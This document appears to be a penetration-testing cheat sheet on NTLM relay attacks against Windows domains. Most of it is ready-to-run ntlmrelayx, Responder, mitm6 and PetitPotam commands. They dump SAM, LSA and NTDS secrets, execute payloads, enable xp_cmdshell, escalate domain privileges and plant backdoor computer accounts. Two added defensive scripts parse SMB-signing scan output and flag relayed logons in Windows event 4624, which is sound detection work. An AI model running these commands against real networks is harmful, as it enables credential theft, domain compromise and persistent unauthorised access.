NTLM Relay Attacks
Understanding NTLM Relay
Core Concept
Purpose: Intercept NTLM authentication attempts and relay them to target systems without needing to crack password hashes.
Attack Flow:
Victim → Attacker (Relay Server) → Target System
Victim initiates NTLM authentication to attacker
Attacker forwards authentication to legitimate target
Target grants access based on victim's credentials
Attacker gains access as the victim
Requirements:
Network position to intercept authentication
Target systems that do not require SMB signing (or that lack the equivalent protections for other protocols, such as LDAP signing and channel binding)
Victim authentication attempts (natural or forced)
Attack Value: Immediate access to systems without password cracking, works with strong passwords
SMB Relay Attacks
Classic SMB to SMB Relay
Purpose: Relay SMB authentication between different SMB services for lateral movement.
Basic SMB Relay Setup
# Identify relay targets (systems without SMB signing)
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt
# Basic SMB relay to multiple targets
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support
# Relay with immediate command execution
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -c "whoami && ipconfig"
# Interactive shell via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -i
# Connect to interactive shell: nc 127.0.0.1 11000
Advanced SMB Relay Operations
# Dump SAM database via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --sam
# Dump LSA secrets via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --lsa
# Execute specific payload
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -e ./payload.exe
# One-shot attack (exit after first successful relay)
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --one-shot
Requirements: SMB signing not required on targets (either disabled or merely "supported" but optional), network access
Attack Value: File system access, credential dumping, code execution
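From the defender's side, the same signing check is the starting point for remediation: every host that answers "supported" or "disabled" to the nmap smb-security-mode probe is relayable. The following parser is an added example, not part of the original page; it reads nmap normal output (the scan text is a constructed, abbreviated sample) and lists hosts whose SMB server does not require signing.

```python
"""Added example (not from the original page): parse `nmap -p 445 --script
smb-security-mode` normal output and report which hosts still accept
unsigned SMB sessions, i.e. the hosts to fix first."""
import re

# Constructed, abbreviated nmap normal output for three hosts (not a real scan).
SAMPLE_SCAN = """\
Nmap scan report for fs01.corp.example (10.0.0.5)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc01.corp.example (10.0.0.10)
Host script results:
| smb-security-mode:
|_  message_signing: required

Nmap scan report for 10.0.0.23
Host script results:
| smb-security-mode:
|_  message_signing: supported
"""

# "Nmap scan report for <name> (<ip>)" or "Nmap scan report for <ip>"
HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[^)]+)\))?$")
# "|_  message_signing: required" / "supported" / "disabled (dangerous, but default)"
SIGN_RE = re.compile(r"^\|_?\s+message_signing:\s*(?P<mode>\w+)")


def parse_signing(scan_text):
    """Return {ip_or_name: mode} where mode is 'required', 'supported' or 'disabled'."""
    results, current = {}, None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip") or m.group("name")
            continue
        m = SIGN_RE.match(line)
        if m and current:
            results[current] = m.group("mode")
    return results


def relay_exposed(scan_text):
    """Hosts whose SMB server does not *require* signing. 'supported' means
    signing is enabled but optional, which is still relayable."""
    return sorted(h for h, mode in parse_signing(scan_text).items() if mode != "required")


if __name__ == "__main__":
    for host in relay_exposed(SAMPLE_SCAN):
        print("SMB signing not required:", host)
```

Feed it the saved output of a real scan (`nmap -oN scan.txt ...`) and compare the result against the list `--gen-relay-list` produces; any host on either list needs RequireSecuritySignature enforced.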
SMB Relay with Responder Integration
# Terminal 1: Responder in analysis mode (capture but don't respond)
sudo responder -I eth0 -A -v
# Terminal 2: NTLM relay server
python3 ntlmrelayx.py -tf targets.txt -smb2support
# Terminal 3: Force authentication (optional)
# Access non-existent share to trigger authentication
net use \\<attacker-ip>\fake
Cross-Protocol Relay Attacks
SMB to LDAP Relay
Purpose: Relay SMB authentication to domain controllers for Active Directory privilege escalation.
LDAP Privilege Escalation
# Basic privilege escalation via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <low-priv-user>
# Add computer account via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer EVILCOMPUTER$ --computer-pass CompPass123!
# Delegate access permissions
python3 ntlmrelayx.py -t ldap://<DC-IP> --delegate-access --escalate-user <username>
# LDAP relay with DCSync attack setup
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <username> --dump
LDAPS (Secure LDAP) Relay
# Relay to LDAPS (encrypted LDAP)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username>
# LDAPS with certificate validation bypass
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username> --no-validate-privs
# Target specific LDAP operations
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer NEWPC$ --delegate-access
Requirements: Domain controller reachable with LDAP signing not enforced (and, for LDAPS, channel binding not enforced), victim with sufficient domain privileges
Attack Value: Domain admin rights, DCSync capabilities, computer account creation
SMB to HTTP/HTTPS Relay
Purpose: Relay SMB authentication to web applications supporting NTLM authentication.
Web Application Relay
# Basic HTTP relay
python3 ntlmrelayx.py -t http://<web-server> -smb2support
# HTTPS relay with specific endpoints
python3 ntlmrelayx.py -t https://<web-server>/admin -smb2support
# Multiple HTTP targets
echo "http://web1.company.com" > http_targets.txt
echo "https://web2.company.com/api" >> http_targets.txt
python3 ntlmrelayx.py -tf http_targets.txt -smb2support
Exchange Server Relay
# Relay to Exchange Web Services (EWS)
python3 ntlmrelayx.py -t https://<exchange-server>/EWS/Exchange.asmx -smb2support
# Relay to Outlook Web Access
python3 ntlmrelayx.py -t https://<exchange-server>/owa -smb2support
# Exchange PowerShell endpoint
python3 ntlmrelayx.py -t https://<exchange-server>/PowerShell -smb2support
Requirements: Web applications with NTLM authentication enabled
Attack Value: Web application access, email system compromise, API exploitation
Specialized Protocol Relay
MSSQL Relay Attacks
Purpose: Relay authentication to SQL Server instances for database access and code execution.
# Basic MSSQL relay
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support
# MSSQL relay with immediate query execution
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support -q "SELECT @@version"
# Enable xp_cmdshell via relay
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support --enable-xp-cmdshell
# MSSQL relay with command execution
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support -c "whoami"
WinRM Relay Attacks
Purpose: Relay authentication to Windows Remote Management for PowerShell access.
# WinRM relay for remote PowerShell
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support
# WinRM with immediate command execution
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support -c "Get-Process"
# Interactive WinRM session
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support -i
Requirements: WinRM enabled with NTLM authentication
Attack Value: Remote PowerShell access, administrative control
Advanced Relay Techniques
IPv6 + NTLM Relay Combination
Purpose: Combine IPv6 attacks with NTLM relay for enhanced targeting and stealth.
mitm6 + ntlmrelayx Integration
# Terminal 1: IPv6 DHCPv6 attack
sudo mitm6 -d <domain.com> --ignore-nofqdn
# Terminal 2: NTLM relay with IPv6 support
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username> --delegate-access
# Terminal 3: Monitor for incoming connections
sudo netstat -tuln | grep :445
Requirements: IPv6 enabled in target environment
Attack Value: More reliable targeting, DNS manipulation, stealth
Multi-Protocol Relay Chains
Purpose: Chain multiple relay operations across different protocols for complex attack paths.
# Multi-target relay with different protocols
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support
# Where mixed_targets.txt contains:
# smb://server1.domain.com
# http://webapp.domain.com
# ldap://dc.domain.com
# mssql://database.domain.com
# Chain with specific operations per protocol
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <user> \
-tf smb_targets.txt --sam --lsa
WebDAV Relay Bypass
Purpose: Use WebDAV to bypass SMB signing restrictions.
# WebDAV relay setup
python3 ntlmrelayx.py -t http://<target-server>/webdav -smb2support
# Force WebDAV authentication
net use Z: \\<attacker-ip>\webdav /persistent:no
# WebDAV with file upload capability
python3 ntlmrelayx.py -t http://<target-server>/webdav -smb2support \
--upload-file payload.exe --upload-path /uploads/
Relay Attack Workflow
Comprehensive Relay Assessment
# Phase 1: Target identification
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt
nmap -p 445 --script smb-security-mode <network-range>
# Phase 2: Multi-protocol relay setup
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support \
-t ldap://<DC-IP> --escalate-user <lowpriv-user>
# Phase 3: Authentication forcing (covered in next section)
python3 PetitPotam.py <attacker-ip> <high-value-target>
# Phase 4: Exploitation and data extraction
python3 ntlmrelayx.py -tf targets.txt -smb2support --sam --lsa --ntds
# Phase 5: Persistence establishment
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer BACKDOOR$ \
--delegate-access --escalate-user <compromised-user>
Attack Success Indicators
SMB Relay: Administrative access to file shares, SAM/LSA dumps
LDAP Relay: Domain privilege escalation, DCSync rights acquisition
HTTP Relay: Web application access, session hijacking
Cross-Protocol: Multi-service access, complex privilege chains
IPv6 Integration: DNS manipulation, enhanced stealth capabilities
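The indicators above are the attacker's view. The defender's counterpart, as an added example that is not part of the original page, is a heuristic over Security event 4624: in a relay the NTLM AUTHENTICATE message still carries the victim's workstation name, while the TCP peer the target records as the source address is the relay host, so an NTLM network logon whose WorkstationName does not belong to its IpAddress deserves a look. The inventory and event records below are constructed sample data.

```python
"""Added example (not from the original page): flag NTLM network logons in
Windows Security event 4624 whose claimed workstation name does not match
the host that owns the source IP, a common artefact of a relayed logon."""

# Constructed asset inventory: IP -> hostname (normally from DHCP, DNS or a CMDB).
INVENTORY = {
    "10.0.0.5": "FS01",
    "10.0.0.44": "WS-ALICE",
    "10.0.0.99": "LAB-BOX",   # unmanaged host, not a domain member
}

# Constructed 4624 records, reduced to the fields the heuristic needs.
EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS-ALICE", "IpAddress": "10.0.0.44"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS-ALICE", "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "bob", "WorkstationName": "-", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "svc", "WorkstationName": "FS01", "IpAddress": "127.0.0.1"},
]


def is_relay_candidate(event, inventory):
    """True for an NTLM network logon (type 3) whose claimed workstation is
    not the host behind the source IP. An IP missing from the inventory also
    counts as a mismatch, since a relay host is rarely a managed asset."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return False
    if event.get("AuthenticationPackageName", "").upper() != "NTLM":
        return False
    claimed = event.get("WorkstationName", "-").upper()
    if claimed in ("", "-"):
        return False   # no name to compare; review such logons separately
    actual = inventory.get(event.get("IpAddress", ""), "").upper()
    return actual != claimed


def relay_candidates(events, inventory):
    """Return (user, claimed_workstation, source_ip) for each suspicious logon."""
    return [(e["TargetUserName"], e["WorkstationName"], e["IpAddress"])
            for e in events if is_relay_candidate(e, inventory)]


if __name__ == "__main__":
    for row in relay_candidates(EVENTS, INVENTORY):
        print("possible relayed NTLM logon:", row)
```

Expect false positives from NAT, VPN address pools and hosts whose NetBIOS name differs from their DNS name; keep the inventory current and correlate with the 4624 records on the domain controller for LDAP relays.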